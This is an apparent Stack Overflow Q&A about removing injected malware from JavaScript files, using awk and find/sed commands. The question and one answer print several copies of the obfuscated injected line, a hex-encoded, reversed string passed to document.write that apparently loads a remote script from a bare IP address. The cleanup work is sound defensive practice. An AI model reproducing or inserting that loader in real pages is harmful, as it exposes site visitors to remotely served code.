replacing a complex pattern using sed

Question

I want to replace a pattern by using sed command. The pattern to be removed is as below with a space.

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))

Now I need to replace the above pattern with a space. This patter can be anywhere in the file ( i.e can be on the begining on the file / end of file or between some strings)

any tips for regex to remove via sed ?

Thanks.

Looks like an XY problem. What are you trying to accomplish? — Sobrique, Feb 01 '17 at 13:39
it's a malware injected to java-scripts and I want to remove this malware from every file. — Iamtheroot, Feb 01 '17 at 13:40
[look into quotemeta \Q \E](http://perldoc.perl.org/functions/quotemeta.html) — AbhiNickz, Feb 01 '17 at 13:40
I guess this [link](http://stackoverflow.com/questions/29613304/is-it-possible-to-escape-regex-metacharacters-reliably-with-sed) contains very detailed answer. — AbhiNickz, Feb 01 '17 at 13:43
It's definitely and reliably possible. I've asked that question a time ago. Check that: https://stackoverflow.com/questions/29613304/is-it-possible-to-escape-regex-metacharacters-reliably-with-sed — hek2mgl, Feb 01 '17 at 13:51
PS: If `var _0xaae8` is a constant, you might simply use `sed /var _0xaae8/d` — hek2mgl, Feb 01 '17 at 13:53
it's a constant but i don't want to remove the complete line but just remove the pattern only. — Iamtheroot, Feb 01 '17 at 21:10

slitvinov · Accepted Answer · 2017-02-03T20:25:04.773

$ cat r.awk
#!/usr/bin/awk -f

NR == FNR { # read a first file with a string to match
    str = $0
    rep = " " # replace by `rep'
    RS = "$^" # regexp which never matches => the next record will be
              # a string with a whole second file
    nextfile
}

{
    file = $0; ans = ""
    while (i = index(file, str)) {
        pre  = substr(file, 1              , i - 1)  # parts before
        post = substr(file, i + length(str))         # and after `str'
        ans  = ans pre rep # append to the output
        file = post
    }
    ans = ans file
    printf "%s", ans
}

Store a string in a file

$ cat r.txt
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))

An example

$ cat f.txt
BEFORE
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))
AFTER
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))
END

Usage:

$ awk -f r.awk r.txt f.txt

BEFORE

AFTER

END

Thanks. That looks promising. Also how do we update the changes via awk to the file ? like sed -i ? — Iamtheroot, Feb 02 '17 at 02:38
I am using gawk-4.0.2-4.el7.x86_64 so doesn't look like in-place is not an option. — Iamtheroot, Feb 02 '17 at 03:01
To make it work in-place I would make an adapter shell script: ` "$1" > /tmp/t.file && mv /tmp/t.file "$1"` — slitvinov, Feb 03 '17 at 20:24

Mostafa Hussein · Answer 2 · 2017-02-21T11:56:24.487

Another way to achieve what you are looking for "removing the pattern only" using find and sed commands in one line:

$ find /path/to/files/ -type f \( -name "*.js" -o -name "*.json" \) -exec sh -c 'sed -i "s/var\s_0xaae8.*_0xaae8\[0\]))//" "$0"' {} \;

The above command will search under specific path and remove the pattern if found from any file with these extensions js or json.

for JS only:

$ find /path/to/files/ -type f -name "*.js" -exec sed -i "s/var\s_0xaae8.*_0xaae8\[0\]))//" '{}' \;

Feel free to remove the -name "*.x" part if you want to search for any file with any extension

replacing a complex pattern using sed

2 Answers2

Linked